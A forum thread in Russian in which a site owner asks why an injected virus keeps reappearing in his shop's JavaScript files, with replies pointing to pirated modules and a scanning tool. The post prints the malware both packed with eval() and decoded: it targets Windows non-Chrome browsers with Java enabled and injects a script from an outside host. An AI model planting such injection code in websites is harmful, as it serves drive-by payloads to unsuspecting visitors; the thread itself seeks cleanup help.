Перейти до вмісту
Пошук в
  • Детальніше...
Шукати результати, які ...
Шукати результати в ...

Постоянно появляется вирус


FEAR93

Recommended Posts

Добрый день. Последние месяцы Яндекс стал сообщать, что сайт заражен вирусом. Стал разбираться, вирус нашел, удалил. Но через время он начал появляться снова и снова, с новым именем и в других каталогах.

Код вируса




eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('6 e(8){j(5.c&&5.f){3 h=5.f(\'k\')[0];3 4=5.c(\'l\');4.d(\'o\',\'n/m\');4.d(\'8\',8);h.t(4)}}6 i(2){v 2.g("x")==-1}3 b="y://p.w.2/u";3 7="7";6 a(){3 2=9.q.r();j((i(2)&&2.g(7)!=-1)&&9.s()){e(b)}}a();',35,35,'||ua|var|script_tag|document|function|win|src|navigator|includeCounter|url|createElement|setAttribute|includeJavascript|getElementsByTagName|indexOf|head_tag|notChrome|if|head|script|javascript|text|type|letyky|userAgent|toLowerCase|javaEnabled|appendChild|89f7f2f7dc74d34c0400d965d0c6957689f7f2f7dc74d34c0400d965d0c6957689f7f2f7dc74d34c0400d965d0c695|return|pp|chrome|http'.split('|'),0,{}))
После расшифровки видим это






function includeJavascript(src) {
if (document.createElement && document.getElementsByTagName) {
var head_tag = document.getElementsByTagName('head')[0];
var script_tag = document.createElement('script');
script_tag.setAttribute('type', 'text/javascript');
script_tag.setAttribute('src', src);
head_tag.appendChild(script_tag)
}
}

function notChrome(ua) {
return ua.indexOf("chrome") == -1
}
var url = "http://letyky.pp.ua/89f7f2f7dc74d34c0400d965d0c6957689f7f2f7dc74d34c0400d965d0c6957689f7f2f7dc74d34c0400d965d0c695";
var win = "win";

function includeCounter() {
var ua = navigator.userAgent.toLowerCase();
if ((notChrome(ua) && ua.indexOf(win) != -1) && navigator.javaEnabled()) {
includeJavascript(url)
}
}
includeCounter();
Ссылка на этот скрипт может быть в любом из js файлов.

letyky.pp.ua пингуется. Но через браузер недоступен. Помогите найти дырку, через которую постоянно заливают этот скрипт.

Адрес сайта auroramarket.com

Пароли к фтп админке менял, результат не дало.

Надіслати
Поділитися на інших сайтах


и модулями варезными вы конечно не пользуетесь

Надіслати
Поділитися на інших сайтах

Много раз выручал этот скрипт http://www.revisium.com/ai/

только много ложных срабатываний

те файлы, на которые ругается нужно сравнить с оригинальными из сборки, и выпилить заразу

Надіслати
Поділитися на інших сайтах

Створіть аккаунт або увійдіть для коментування

Ви повинні бути користувачем, щоб залишити коментар

Створити обліковий запис

Зареєструйтеся для отримання облікового запису. Це просто!

Зареєструвати аккаунт

Вхід

Уже зареєстровані? Увійдіть тут.

Вхід зараз
  • Зараз на сторінці   0 користувачів

    • Ні користувачів, які переглядиють цю сторінку

×
×
  • Створити...

Important Information

На нашому сайті використовуються файли cookie і відбувається обробка деяких персональних даних користувачів, щоб поліпшити користувальницький інтерфейс. Щоб дізнатися для чого і які персональні дані ми обробляємо перейдіть за посиланням . Якщо Ви натиснете «Я даю згоду», це означає, що Ви розумієте і приймаєте всі умови, зазначені в цьому Повідомленні про конфіденційність.